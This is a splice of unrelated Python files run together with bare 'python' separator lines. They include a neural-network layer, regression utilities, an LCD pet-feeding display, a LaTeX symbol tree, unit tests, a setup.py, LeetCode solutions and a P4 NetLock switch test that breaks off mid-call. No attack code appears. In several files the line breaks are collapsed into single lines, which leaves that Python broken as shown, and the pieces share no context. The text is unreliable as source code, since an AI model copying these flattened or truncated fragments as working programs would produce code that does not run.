        Expects self.gradients["dA"] to be set by the downstream layer
        before this is called.
        """
        dA = self.gradients["dA"]
        a_prev = self.prev_layer.cache["A"]
        dZ = self.activation.differentiate(dA, self.cache["A"])
        # m = batch size
        m = a_prev.shape[1]
        dW = 1 / m * np.dot(dZ, a_prev.T)
        db = 1 / m * np.sum(dZ, axis=1, keepdims=True)
        # don't need to store the next layer dA anymore, overwrite
        dA = np.dot(self.weights.T, dZ)

        # Hand dA to the previous layer; the Input layer has no `gradients`
        # dict, which signals that backpropagation is finished.
        try:
            self.prev_layer.gradients["dA"] = dA
        except AttributeError:
            pass
        self.gradients = {"dW": dW, "db": db}


# Planned output layer -- not implemented yet.
# class Output(Layer):
#     def __init__(self, prev_layer: Layer, out_units: int, loss_function):
#         self.m = prev_layer.n
#         self.n = out_units
#         self.loss_function = loss_function
#         self.prev_layer = prev_layer
#
#     def forward_step(self):
#
#
#     def backward_step(self):
#         pass
python
import numpy as np
from matplotlib import pyplot as plt
import time

from numba import jit


def load_delta_U(fname):
    """Load precomputed pairwise covariate distances from an .npz archive.

    Assumes the archive was written with a single positional array
    (np.savez_compressed(fname, delta_U)), i.e. stored under 'arr_0'.
    """
    npz_arr = np.load(fname)
    delta_U = npz_arr['arr_0']
    print("Successfully Loaded covariate distances from {}".format(fname))
    return delta_U


def create_delta_U(dmr, U, dU, K, N, fname, normalize=True):
    """Compute pairwise covariate distances and optionally save them.

    :param dmr: object providing make_covariate_distances(U, dU, K, N, normalize).
    :param fname: .npz path to save to, or None to skip saving.
    :returns: the computed distance array.
    """
    # Assumes fname is .npz
    print("Calculating Pairwise Co-Variate Distances...")
    t = time.time()
    delta_U = dmr.make_covariate_distances(U, dU, K, N, normalize)
    print("Finished. Took {:.3f} seconds.".format(time.time() - t))
    if fname is not None:
        print("Saving Pairwise Co-Variate Distances to {}".format(fname))
        np.savez_compressed(fname, delta_U)
    return delta_U


def print_errors(calc_pred_err, estimations, err_name):
    """Print and return (error, estimator_name) pairs for each estimation.

    :param calc_pred_err: callable mapping a beta_hat to a scalar error.
    :param estimations: iterable of (beta_hat, estimator_name) tuples.
    """
    print("="*20 + " {} Error ".format(err_name) + "="*20)
    pred_errs = []
    for (beta_hat, estimator_name) in estimations:
        err = calc_pred_err(beta_hat)
        pred_errs.append((err, estimator_name))
        print("{}:{:.2f}".format(estimator_name, err))
    return pred_errs


@jit(nopython=True)
def soft_normalize(x):
    """Compute softmax values for the scores in x."""
    # Numerical-stability fix: subtracting the max before exponentiating is
    # mathematically identical but prevents overflow for large scores.
    exps = np.exp(x - np.max(x))
    return exps / np.sum(exps)


def float_or_zero(x):
    """Coerce x to float, mapping unparsable values to 0.0."""
    try:
        return float(x)
    except ValueError:
        return 0.


def to_one_hot(U, should_change):
    """Encode the columns of U: one-hot where should_change[j] is truthy,
    otherwise keep the column as floats (unparsable entries become 0).

    :returns: a 2-D array with the encoded columns horizontally stacked.
    """
    if should_change[0]:
        one_hot = to_one_hot_one_feature(U[:, 0])
    else:
        one_hot = np.array([float_or_zero(U[i, 0]) for i in range(len(U))])
        one_hot = np.expand_dims(one_hot, 1)
    for j in range(1, U.shape[1]):
        if should_change[j]:
            one_hot_feature = to_one_hot_one_feature(U[:, j])
            one_hot = np.hstack((one_hot, one_hot_feature))
        else:
            continuous_feature = np.array(
                [float_or_zero(U[i, j]) for i in range(len(U))])
            continuous_feature = np.expand_dims(continuous_feature, 1)
            one_hot = np.hstack((one_hot, continuous_feature))
    return one_hot


def to_one_hot_one_feature(U):
    """One-hot encode a single categorical feature vector.

    Assumes U has a single feature.
    Returns a matrix of shape (U.shape[0], number of unique values).
    (Docstring fix: the old text claimed number_unique + 1 columns, but the
    matrix is allocated with exactly len(set(U)) columns.)

    NOTE(review): the category-to-column mapping comes from iterating a set,
    so it is not stable across processes; confirm callers do not rely on a
    deterministic column order.
    """
    as_set = set(U)
    set_as_list = list(as_set)
    one_hot = np.zeros((U.shape[0], len(as_set)))
    for i in range(U.shape[0]):
        one_hot[i, set_as_list.index(U[i])] = 1
    return one_hot


def plot_learned_betas(true_beta, estimations, U):
    """Scatter-plot true vs estimated 2-D betas, one subplot per category.

    :param true_beta: array of true coefficients (first two columns plotted).
    :param estimations: iterable of (estimation_array, estimator_name).
    :param U: covariates; the first column is treated as the category label.
    """
    fig = plt.figure()
    # Assumes the first value in each row of U is a category
    colors = ['blue', 'green', 'cyan', 'orange', 'red']
    true_color = 'black'
    labels = set(U[:, 0])
    for i, label in enumerate(labels):
        # Bug fix: add_subplot requires integer row/column counts; the old
        # len(labels)/2+1 produced a float under Python 3's true division.
        ax = fig.add_subplot(len(labels) // 2 + 1, 2, i + 1)
        ax.set_title("Type={}".format(label))
        handles = []
        descriptions = []
        selection = U[:, 0] == label
        handle = ax.scatter(
            true_beta[selection, 0], true_beta[selection, 1],
            color=true_color, marker='*')
        handles.append(handle)
        descriptions.append('True Beta')
        for j, (estimation, estimator_name) in enumerate(estimations):
            handle = ax.scatter(
                estimation[selection, 0], estimation[selection, 1],
                color=colors[j], marker='+')
            handles.append(handle)
            descriptions.append(estimator_name)
        # NOTE(review): this extra subplot (slot i+2) overwrites `ax` each
        # iteration and looks like it only reserves space for the legend;
        # confirm it is intentional before removing.
        ax = fig.add_subplot(len(labels) // 2 + 1, 2, i + 2)
    plt.legend(handles, descriptions, loc='upper center',
               bbox_to_anchor=(0.5, 1.05), ncol=2, fancybox=True, shadow=True)
    plt.show()
python
import time from datetime import datetime # our libs from src import lcd def renderDisplay(): # Initialise display lcd.lcd_init() now = datetime.now() # dd/mm/YY H:M:S date_time = now.strftime("%d/%m/%Y %H:%M:%S") # Send some more text lcd.lcd_string("Akaal last fed:", lcd.LCD_LINE_1) lcd.lcd_string("", lcd.LCD_LINE_2) lcd.lcd_string(f"{date_time}", lcd.LCD_LINE_3) lcd.lcd_string("nom nom nom", lcd.LCD_LINE_4)
python
from typing import List, Dict, Callable, Optional

from utils.types import Box

from .utils import RELATIONS, optimize_latex_string


class SymbolTreeNode:
    """A recognised symbol linked to neighbours by spatial relations.

    Each node stores one adjacency list per relation in RELATIONS plus a
    mirrored `<relation>_inverse` list; the tree rooted at a node can be
    rendered back to a LaTeX string with `generate_latex`.
    """

    # these will be placed when a bracket should not be optimized
    # for example `\frac{w}{a}` should not be converted to `\fracwa`, but `\frac{w}a` is fine
    # so we try to place these where appropriate, then after all generation, they will be replaced by the correct
    # bracket type
    __NO_OPTIMIZE_OPEN_BRACKET = '\u1234'
    __NO_OPTIMIZE_CLOSE_BRACKET = '\u1235'

    # labels whose `left`/`none` continuation is wrapped in the
    # non-optimizable placeholder brackets above
    __LABELS_LEFT_CANNOT_OPTIMIZE = ['\\sum', '\\int', '\\pi']

    def __init__(self, label: str, crop: Box, position: int) -> None:
        # index of this symbol in the original detection order; used as the
        # node's identity when connecting/removing relations
        self.position: int = position
        # LaTeX label of the symbol (e.g. 'x', '\\frac')
        self.label: str = label
        # bounding box of the symbol in the source image
        self.crop: Box = crop
        self.relations: Dict[str, List['SymbolTreeNode']] = {relation_name: [] for relation_name in RELATIONS}
        # add inverse relations
        self.relations.update({f"{relation_name}_inverse": [] for relation_name in RELATIONS})

    def connect_with_relation(self, other: 'SymbolTreeNode', relation: str) -> None:
        """Connect `self -> other` under `relation`, recording the inverse edge on `other`.

        Raises AssertionError if the relation is unknown or the edge exists.
        """
        assert relation in RELATIONS, f"relation type {relation} is unknown"
        relations_list = self.relations[relation]
        already_exist_index = SymbolTreeNode.__find_node_with_condition(
            relations_list, lambda node: node.position == other.position)
        assert already_exist_index is None, \
            f"connection from {self.position} to {other.position} with relation '{relation}' already exists"
        relations_list.append(other)
        other.__connect_with_relation_inverse(self, relation)

    def __connect_with_relation_inverse(self, other: 'SymbolTreeNode', relation: str) -> None:
        # Mirror of connect_with_relation: records `other` in this node's
        # `<relation>_inverse` list (no further recursion).
        assert relation in RELATIONS, f"relation type {relation} is unknown"
        relations_list = self.relations[f"{relation}_inverse"]
        already_exist_index = SymbolTreeNode.__find_node_with_condition(
            relations_list, lambda node: node.position == other.position)
        assert already_exist_index is None, \
            f"connection from {self.position} to {other.position} with relation '{relation}_inverse' already exists"
        relations_list.append(other)

    def remove_connection_with_relation(self, relation: str, position: int) -> None:
        """Remove the edge to the node at `position` under `relation` (and its inverse).

        Raises ValueError when no such edge exists.
        """
        assert relation in RELATIONS, f"relation type {relation} is unknown"
        relations_list = self.relations[relation]
        index = SymbolTreeNode.__find_node_with_condition(
            relations_list, lambda node: node.position == position)
        if index is not None:
            other = relations_list.pop(index)
            other.__remove_connection_with_relation_inverse(relation, self.position)
        else:
            raise ValueError(f"node with position {position} could not be found in relation {relation}")

    def __remove_connection_with_relation_inverse(self, relation: str, position: int) -> None:
        # Mirror of remove_connection_with_relation for the `_inverse` list.
        assert relation in RELATIONS, f"relation type {relation} is unknown"
        relations_list = self.relations[f"{relation}_inverse"]
        index = SymbolTreeNode.__find_node_with_condition(
            relations_list, lambda node: node.position == position)
        if index is not None:
            relations_list.pop(index)
        else:
            raise ValueError(f"node with position {position} could not be found in relation {relation}_inverse")

    def normalized(self) -> bool:
        """Return True when every forward relation has at most one target node."""
        for relation_str in RELATIONS:
            if len(self.relations[relation_str]) > 1:
                return False
        return True

    def generate_latex(self, optimize: bool = True) -> str:
        """Render the subtree rooted here to a LaTeX string.

        Generation always runs unoptimized first; if `optimize` is True a
        single optimization pass is applied, then the placeholder brackets
        are replaced with real braces.
        """
        result = self.__generate_latex(optimize=False)

        # optimize in one go
        if optimize:
            result = optimize_latex_string(result)

        result = result.replace(SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET, '{').replace(
            SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET, '}')
        return result

    def __generate_latex(self, optimize: bool = False) -> str:
        # Recursive worker: emits this node's label plus fraction parts,
        # sub/superscripts, and the left-neighbour continuation.
        result = self.label
        assert self.normalized(), "some relation/s have more than one node"

        if self.label == '\\frac':
            assert self.relations['up'] and self.relations['down'], "\\frac should have `up` and `down` relations"
            up_node = self.relations['up'][0]
            down_node = self.relations['down'][0]
            # numerator uses the non-optimizable placeholder brackets
            # (see class comment); denominator uses plain braces
            result += f"{SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET}{up_node.__generate_latex(optimize)}" \
                      f"{SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET}{{{down_node.__generate_latex(optimize)}}}"
            for relation_str in ['power', 'sub']:
                assert not self.relations[relation_str], f"\\frac cannot have `{relation_str}` relation"
        elif self.label == '\\sum':
            if up_node := self.relations['up']:
                result += f"^{{{up_node[0].__generate_latex(optimize)}}}"
            if down_node := self.relations['down']:
                result += f"_{{{down_node[0].__generate_latex(optimize)}}}"
        elif self.label == '\\int':
            # integral bounds may arrive as either up/down or power/sub
            up_and_power = self.relations['up'] + self.relations['power']
            down_and_sub = self.relations['down'] + self.relations['sub']
            if up_and_power:
                assert len(up_and_power) == 1, "Integral cannot have two up connections"
                result += f"^{{{up_and_power[0].__generate_latex(optimize)}}}"
            if down_and_sub:
                assert len(down_and_sub) == 1, "Integral cannot have two down connections"
                result += f"_{{{down_and_sub[0].__generate_latex(optimize)}}}"
        else:
            if nodes := self.relations['sub']:
                result += f"_{{{nodes[0].__generate_latex(optimize)}}}"
            if nodes := self.relations['power']:
                result += f"^{{{nodes[0].__generate_latex(optimize)}}}"
            for relation_str in ['up', 'down']:
                assert not self.relations[relation_str], f"`{self.label}` cannot have `{relation_str}` relation"

        # in this case, we treat `none` as `left` because there is no other way
        # FIXME: maybe throw exception on `none`?
        for relation_str in ['left', 'none']:
            if self.label in SymbolTreeNode.__LABELS_LEFT_CANNOT_OPTIMIZE:
                prefix = SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET
                suffix = SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET
            else:
                prefix = ""
                suffix = ""
            if nodes := self.relations[relation_str]:
                result += f'{prefix}{nodes[0].__generate_latex(optimize)}{suffix}'

        if optimize:
            return optimize_latex_string(result)
        return result

    @staticmethod
    def __find_node_with_condition(nodes: List['SymbolTreeNode'],
                                   condition: Callable[['SymbolTreeNode'], bool]) -> \
            Optional[int]:
        # Linear scan; index of the first node matching `condition`, or None.
        for i, node in enumerate(nodes):
            if condition(node):
                return i
        return None
python
import os
import tempfile
import unittest

from epregressions.builds.base import BaseBuildDirectoryStructure, autodetect_build_dir_type, KnownBuildTypes


class TestAutoDetectBuildType(unittest.TestCase):
    """Exercises autodetect_build_dir_type against a synthetic build directory."""

    def setUp(self):
        # fresh scratch directory per test (left for the OS to clean up)
        self.build_dir = tempfile.mkdtemp()

    def add_cache_file(self, content):
        # Write a CMakeCache.txt with the given content into the build dir.
        cache_file = os.path.join(self.build_dir, 'CMakeCache.txt')
        with open(cache_file, 'w') as f:
            f.write(content)

    def add_subdirectory(self, dir_name):
        os.makedirs(os.path.join(self.build_dir, dir_name))

    def test_empty_dir_is_unknown(self):
        self.assertEqual(KnownBuildTypes.Unknown, autodetect_build_dir_type(self.build_dir))

    def test_detect_install(self):
        # an 'ExampleFiles' subdirectory is detected as an installation
        self.add_subdirectory('ExampleFiles')
        self.assertEqual(KnownBuildTypes.Installation, autodetect_build_dir_type(self.build_dir))

    def test_detect_makefile(self):
        self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Unix Makefiles')
        self.assertEqual(KnownBuildTypes.Makefile, autodetect_build_dir_type(self.build_dir))

    def test_detect_visual_studio(self):
        self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Visual Studio 2019')
        self.assertEqual(KnownBuildTypes.VisualStudio, autodetect_build_dir_type(self.build_dir))

    def test_detect_ninja(self):
        # a Ninja generator is expected to be classified as Makefile
        self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Ninja')
        self.assertEqual(KnownBuildTypes.Makefile, autodetect_build_dir_type(self.build_dir))


class TestBaseBuildMethods(unittest.TestCase):
    """Checks the abstract-method contract and helpers of BaseBuildDirectoryStructure."""

    def setUp(self):
        self.base_build = BaseBuildDirectoryStructure()

    def test_set_build_directory_abstract(self):
        with self.assertRaises(NotImplementedError):
            self.base_build.set_build_directory('hello')

    def test_get_build_tree_abstract(self):
        with self.assertRaises(NotImplementedError):
            self.base_build.get_build_tree()

    def test_get_idf_directory(self):
        with self.assertRaises(NotImplementedError):
            self.base_build.get_idf_directory()

    def test_verify_without_setting_build_dir(self):
        # verify() is expected to fail before a build directory is set
        with self.assertRaises(Exception):
            self.base_build.verify()

    def test_get_idfs(self):
        temp_idf_dir = tempfile.mkdtemp()
        # empty directory yields an empty set
        self.assertSetEqual(set(), self.base_build.get_idfs_in_dir(temp_idf_dir))
        with open(os.path.join(temp_idf_dir, 'file1.idf'), 'w') as f:
            f.write('hi')
        with open(os.path.join(temp_idf_dir, 'file2.iQQ'), 'w') as f:
            f.write('he')
        with open(os.path.join(temp_idf_dir, 'file3.idf'), 'w') as f:
            f.write('ha')
        with open(os.path.join(temp_idf_dir, 'file4.imf'), 'w') as f:
            f.write('ha')  # macro
        with open(os.path.join(temp_idf_dir, '_ExternalInterface-actuator.idf'), 'w') as f:
            f.write('ha')  # ext interface as FMU
        with open(os.path.join(temp_idf_dir, 'HVAC3ZoneGeometry.imf'), 'w') as f:
            f.write('ha')  # macro resource file
        # TODO: Modify the test to expect relevant IMF files as well and fix the function
        self.assertEqual(3, len(self.base_build.get_idfs_in_dir(temp_idf_dir)))
python
from comprehemd.blocks import HeadingBlock def test_repr() -> None: block = HeadingBlock("foo", level=1, source="foo\n") assert repr(block) == 'HeadingBlock("foo", level="1", source="foo\\n")' def test_str() -> None: block = HeadingBlock("foo", level=1, source="foo\n") assert str(block) == "HeadingBlock (1): foo"
python
import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name="cae", version="0.1", author="Arsenii Astashkin", author_email="[email protected]", description="Hybrid Singular Value Decomposition (SVD) implementation", long_description=long_description, url="https://github.com/arsast/cae", packages=setuptools.find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], license = "MIT", install_requires = [ "joblib == 0.13.2", "numpy == 1.16.3", "scikit - learn == 0.21.1", "scikit - sparse == 0.4.4", "scipy == 1.2.1", "sklearn == 0.0" ] )
python
__________________________________________________________________________________________________ sample 16 ms submission class Solution: def combinationSum3(self, k: int, n: int, d:int = 9) -> List[List[int]]: if k * (2 * d - k + 1) <= 2 * n: return [list(range(d - k + 1, d + 1))] if k * (2 * d - k + 1) == 2 * n else [] if k * (k + 1) >= 2 * n: return [list(range(1, k + 1))] if k * (k + 1) == 2 * n else [] return [l + [d] for l in self.combinationSum3(k - 1, n - d, d - 1)] + self.combinationSum3(k, n, d - 1); __________________________________________________________________________________________________ sample 13000 kb submission class Solution: def combinationSum3(self, k: int, n: int) -> List[List[int]]: nums = list(range(1, 10)) res = [] def dfs(nums, path, k, target, res): if k < 0 or sum(path) > target: return if k == 0 and sum(path) == target: res.append(path) return for i in range(len(nums)): dfs(nums[i+1:], path + [nums[i]], k-1, target, res) dfs(nums, [], k, n, res) return res __________________________________________________________________________________________________
python
import pd_base_tests import pdb import time import sys from collections import OrderedDict from ptf import config from ptf.testutils import * from ptf.thriftutils import * import os from pal_rpc.ttypes import * from netlock.p4_pd_rpc.ttypes import * from mirror_pd_rpc.ttypes import * from res_pd_rpc.ttypes import * from pkt_pd_rpc.ttypes import * from config import * MAX_SLOTS_NUM = 130000 MEM_BIN_PACK = "bin" MEM_RAND_WEIGHT = "r_weight" MEM_RAND_12 = "r_12" MEM_RAND_200 = "r_20" UDP_DSTPORT = 8888 port_ip_dic = {188: 0x0a010001 , 184: 0x0a010002 , 180: 0x0a010003 , 176: 0x0a010004 , 172: 0x0a010005 , 168: 0x0a010006 , 164: 0x0a010007 , 160: 0x0a010008 , 156: 0x0a010009 , 152: 0x0a01000a , 148: 0x0a01000b , 144: 0x0a01000c} tot_num_lks = 0 slots_v_list = [] left_bound_list = [] dev_id = 0 if test_param_get("arch") == "Tofino": print "TYPE Tofino" sys.stdout.flush() MIR_SESS_COUNT = 1024 MAX_SID_NORM = 1015 MAX_SID_COAL = 1023 BASE_SID_NORM = 1 BASE_SID_COAL = 1016 elif test_param_get("arch") == "Tofino2": print "TYPE Tofino2" sys.stdout.flush() MIR_SESS_COUNT = 256 MAX_SID_NORM = 255 MAX_SID_COAL = 255 BASE_SID_NORM = 0 BASE_SID_COAL = 0 else: print "TYPE NONE" print test_param_get("arch") sys.stdout.flush() ports = [188] mirror_ids = [] dev_tgt = DevTarget_t(0, hex_to_i16(0xFFFF)) def setup_random(seed_val=0): if 0 == seed_val: seed_val = int(time.time()) print print "Seed is:", seed_val sys.stdout.flush() random.seed(seed_val) def make_port(pipe, local_port): assert(pipe >= 0 and pipe < 4) assert(local_port >= 0 and local_port < 72) return (pipe << 7) | local_port def port_to_pipe(port): local_port = port & 0x7F assert(local_port < 72) pipe = (port >> 7) & 0x3 assert(port == ((pipe << 7) | local_port)) return pipe def port_to_pipe_local_port(port): return port & 0x7F swports = [] swports_by_pipe = {} for device, port, ifname in config["interfaces"]: if port == 0: continue if port == 64: continue pipe = port_to_pipe(port) print device, port, pipe, ifname print 
int(test_param_get('num_pipes')) if pipe not in swports_by_pipe: swports_by_pipe[pipe] = [] if pipe in range(int(test_param_get('num_pipes'))): swports.append(port) swports.sort() swports_by_pipe[pipe].append(port) swports_by_pipe[pipe].sort() if swports == []: for pipe in range(int(test_param_get('num_pipes'))): for port in range(1): swports.append( make_port(pipe,port) ) cpu_port = 64 #cpu_port = 192 print "Using ports:", swports sys.stdout.flush() def mirror_session(mir_type, mir_dir, sid, egr_port=0, egr_port_v=False, egr_port_queue=0, packet_color=0, mcast_grp_a=0, mcast_grp_a_v=False, mcast_grp_b=0, mcast_grp_b_v=False, max_pkt_len=1024, level1_mcast_hash=0, level2_mcast_hash=0, mcast_l1_xid=0, mcast_l2_xid=0, mcast_rid=0, cos=0, c2c=0, extract_len=0, timeout=0, int_hdr=[], hdr_len=0): return MirrorSessionInfo_t(mir_type, mir_dir, sid, egr_port, egr_port_v, egr_port_queue, packet_color, mcast_grp_a, mcast_grp_a_v, mcast_grp_b, mcast_grp_b_v, max_pkt_len, level1_mcast_hash, level2_mcast_hash, mcast_l1_xid, mcast_l2_xid, mcast_rid, cos, c2c, extract_len, timeout, int_hdr, hdr_len) class NETLOCK_HDR(Packet): name = "NETLOCK_HDR" fields_desc = [ XByteField("recirc_flag", 0), XByteField("op", 0), XByteField("mode", 0), XIntField("tid", 0), XIntField("lock", 0) ] class ADM_HDR(Packet): name = "ADM_HDR" fields_desc = [ XByteField("op", 0), XIntField("lock", 0), XIntField("new_left", 0), XIntField("new_right", 0) ] def netlock_packet(pktlen=0, eth_dst='00:11:11:11:11:11', eth_src='00:22:22:22:22:22', ip_src='0.0.0.2', ip_dst='0.0.0.1', udp_sport=8000, udp_dport=LK_PORT, recirc_flag=0, op=0, mode=0, tid=0, lock=0): udp_pkt = simple_udp_packet(pktlen=0, eth_dst=eth_dst, eth_src=eth_src, ip_dst=ip_dst, ip_src=ip_src, udp_sport=udp_sport, udp_dport=udp_dport) return udp_pkt / NETLOCK_HDR(recirc_flag=recirc_flag, op=op, mode = mode, tid = tid, lock = lock) def adm_packet(pktlen=0, eth_dst='00:11:11:11:11:11', eth_src='00:22:22:22:22:22', ip_src='0.0.0.2', 
ip_dst='0.0.0.1', udp_sport=8000, udp_dport=ADM_PORT, op=0, lock=0, new_left=0, new_right=0): udp_pkt = simple_udp_packet(pktlen=0, eth_dst=eth_dst, eth_src=eth_src, ip_dst=ip_dst, ip_src=ip_src, udp_sport=udp_sport, udp_dport=udp_dport) return udp_pkt / ADM_HDR(op=op, lock = lock, new_left = new_left, new_right = new_right) def scapy_netlock_bindings(): bind_layers(UDP, NETLOCK_HDR, dport=LK_PORT) bind_layers(UDP, ADM_HDR, dport=ADM_PORT) def receive_packet(test, port_id, template): dev, port = port_to_tuple(port_id) (rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(test, dev, port, timeout=2) nrcv = template.__class__(rcv_pkt) return nrcv def print_packet(test, port_id, template): receive_packet(test, port_id, template).show2() def addPorts(test): test.pal.pal_port_add_all(dev_id, pal_port_speed_t.BF_SPEED_40G, pal_fec_type_t.BF_FEC_TYP_NONE) test.pal.pal_port_enable_all(dev_id) ports_not_up = True print "Waiting for ports to come up..." sys.stdout.flush() num_tries = 12 i = 0 while ports_not_up: ports_not_up = False for p in swports: x = test.pal.pal_port_oper_status_get(dev_id, p) if x == pal_oper_status_t.BF_PORT_DOWN: ports_not_up = True print " port", p, "is down" sys.stdout.flush() time.sleep(3) break i = i + 1 if i >= num_tries: break assert ports_not_up == False print "All ports up." 
sys.stdout.flush() return def init_tables(test, sess_hdl, dev_tgt): global tot_num_lks global slots_v_list test.entry_hdls_ipv4 = [] test.entry_hdls_ipv4_2 = [] test.entry_acquire_lock_table = [] test.entry_ethernet_set_mac = [] test.entry_dec_empty_slots_table = [] test.entry_fix_src_port_table = [] test.entry_check_lock_exist_table = [] test.entry_set_tag_table = [] test.entry_change_mode_table = [] test.entry_forward_to_server_table = [] test.entry_get_tenant_inf_table = [] ipv4_table_address_list = [0x0a010001, 0x0a010002, 0x0a010003, 0x0a010004, 0x0a010005, 0x0a010006, 0x0a010007, 0x0a010008, 0x0a010009, 0x0a01000a, 0x0a01000b, 0x0a01000c, 0x01010101] ipv4_table_port_list = [188, 184, 180, 176, 172, 168, 164, 160, 156, 152, 148, 144, 320] tgt_tenant = [1,2,3, 4,5,6, 7,8,9, 10,11,0, 1] ethernet_set_mac_src = ["\xa8\x2b\xb5\xde\x92\x2e", "\xa8\x2b\xb5\xde\x92\x32", "\xa8\x2b\xb5\xde\x92\x36", "\xa8\x2b\xb5\xde\x92\x3a", "\xa8\x2b\xb5\xde\x92\x3e", "\xa8\x2b\xb5\xde\x92\x42", "\xa8\x2b\xb5\xde\x92\x46", "\xa8\x2b\xb5\xde\x92\x4a", "\xa8\x2b\xb5\xde\x92\x4e", "\xa8\x2b\xb5\xde\x92\x52", "\xa8\x2b\xb5\xde\x92\x56", "\xa8\x2b\xb5\xde\x92\x5a"] ethernet_set_mac_dst = ["\x3c\xfd\xfe\xab\xde\xd8", "\x3c\xfd\xfe\xa6\xeb\x10", "\x3c\xfd\xfe\xaa\x5d\x00", "\x3c\xfd\xfe\xaa\x46\x68", "\x3c\xfd\xfe\xab\xde\xf0", "\x3c\xfd\xfe\xab\xdf\x90", "\x3c\xfd\xfe\xab\xe0\x50", "\x3c\xfd\xfe\xab\xd9\xf0", "\xd0\x94\x66\x3b\x12\x37", "\xd0\x94\x66\x84\x9f\x19", "\xd0\x94\x66\x84\x9f\xa9", "\xd0\x94\x66\x84\x54\x81"] # fix_src_port = [9000, 9001, 9002, 9003, 9004, 9005, 9006, 9007] fix_src_port = [] for i in range(256): fix_src_port.append(9000 + i) udp_src_port_list = [] for i in range(128): udp_src_port_list.append(UDP_DSTPORT + i) # add entries for ipv4 routing test.client.ipv4_route_set_default_action__drop(sess_hdl, dev_tgt) for i in range(len(ipv4_table_address_list)): match_spec = netlock_ipv4_route_match_spec_t(ipv4_table_address_list[i]) action_spec = 
netlock_set_egress_action_spec_t(ipv4_table_port_list[i]) entry_hdl = test.client.ipv4_route_table_add_with_set_egress( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_hdls_ipv4.append(entry_hdl) test.client.ipv4_route_2_set_default_action__drop(sess_hdl, dev_tgt) for i in range(len(ipv4_table_address_list)): match_spec = netlock_ipv4_route_2_match_spec_t(ipv4_table_address_list[i]) action_spec = netlock_set_egress_action_spec_t(ipv4_table_port_list[i]) entry_hdl = test.client.ipv4_route_2_table_add_with_set_egress_2( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_hdls_ipv4_2.append(entry_hdl) ## Add multiple servers server_node_num = int(test_param_get('server_node_num')) # add entries for other tables priority_0 = 1 for i in range(server_node_num): match_spec = netlock_forward_to_server_table_match_spec_t(i, server_node_num - 1) action_spec = netlock_forward_to_server_action_action_spec_t(ipv4_table_address_list[11 - i]) entry_hdl = test.client.forward_to_server_table_table_add_with_forward_to_server_action(sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_forward_to_server_table.append(entry_hdl) for i in range(len(ipv4_table_address_list)): match_spec = netlock_get_tenant_inf_table_match_spec_t(ipv4_table_address_list[i]) action_spec = netlock_get_tenant_inf_action_action_spec_t(tgt_tenant[i], 500000000) entry_hdl = test.client.get_tenant_inf_table_table_add_with_get_tenant_inf_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_get_tenant_inf_table.append(entry_hdl) match_spec = netlock_acquire_lock_table_match_spec_t(SHARED_LOCK) entry_hdl = test.client.acquire_lock_table_table_add_with_acquire_shared_lock_action( sess_hdl, dev_tgt, match_spec) test.entry_acquire_lock_table.append(entry_hdl) match_spec = netlock_acquire_lock_table_match_spec_t(EXCLUSIVE_LOCK) entry_hdl = test.client.acquire_lock_table_table_add_with_acquire_exclusive_lock_action( sess_hdl, dev_tgt, match_spec) 
test.entry_acquire_lock_table.append(entry_hdl) match_spec_0 = netlock_dec_empty_slots_table_match_spec_t(0) # normal acquire match_spec_1 = netlock_dec_empty_slots_table_match_spec_t(2) # server push back entry_hdl_0 = test.client.dec_empty_slots_table_table_add_with_dec_empty_slots_action( sess_hdl, dev_tgt, match_spec_0) entry_hdl_1 = test.client.dec_empty_slots_table_table_add_with_push_back_action( sess_hdl, dev_tgt, match_spec_1) test.entry_dec_empty_slots_table.append(entry_hdl_0) test.entry_dec_empty_slots_table.append(entry_hdl_1) priority_0 = 1 for i in range(len(fix_src_port)): match_spec = netlock_fix_src_port_table_match_spec_t(i, len(fix_src_port) - 1) action_spec = netlock_fix_src_port_action_action_spec_t(fix_src_port[i]) entry_hdl = test.client.fix_src_port_table_table_add_with_fix_src_port_action( sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_fix_src_port_table.append(entry_hdl) for i in range(len(udp_src_port_list)): match_spec = netlock_change_mode_table_match_spec_t(i, len(udp_src_port_list) - 1) action_spec = netlock_change_mode_act_action_spec_t(udp_src_port_list[i]) entry_hdl = test.client.change_mode_table_table_add_with_change_mode_act( sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_change_mode_table.append(entry_hdl) match_spec_0_0 = netlock_set_tag_table_match_spec_t(0, 0) match_spec_0_1 = netlock_set_tag_table_match_spec_t(0, 1) match_spec_1_0 = netlock_set_tag_table_match_spec_t(1, 0) match_spec_1_1 = netlock_set_tag_table_match_spec_t(1, 1) entry_hdl_0 = test.client.set_tag_table_table_add_with_set_as_primary_action( sess_hdl, dev_tgt, match_spec_0_0) entry_hdl_1 = test.client.set_tag_table_table_add_with_set_as_secondary_action( sess_hdl, dev_tgt, match_spec_0_1) entry_hdl_2 = test.client.set_tag_table_table_add_with_set_as_primary_action( sess_hdl, dev_tgt, match_spec_1_0) entry_hdl_3 = test.client.set_tag_table_table_add_with_set_as_failure_notification_action( sess_hdl, dev_tgt, 
